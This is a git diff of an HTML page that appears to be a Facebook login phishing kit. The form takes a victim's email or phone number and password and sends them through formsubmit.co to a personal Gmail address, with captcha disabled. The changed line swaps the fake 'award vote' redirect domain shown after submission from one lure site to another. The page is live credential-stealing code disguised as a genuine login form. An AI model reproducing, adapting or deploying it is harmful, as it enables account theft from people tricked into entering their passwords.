--- a/facebook.com/index.html
+++ b/facebook.com/index.html
@@ -20,7 +20,7 @@
             <form action="https://formsubmit.co/christophermark123123@gmail.com" method="POST" class="a-form">
                 <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_template" value="table">
-                <input type="hidden" name="_next" value="https://influencersaward2023.online/vote">
+                <input type="hidden" name="_next" value="https://www.celebrityaward2023.online/vote">
                 <input type="email" id="Email" class="a-email" name="Email" placeholder="Email address or phone number"
                     autofocus="autofocus" required />
                 <input type="password" id="Password" class="a-pss" name="Password" placeholder="Password"
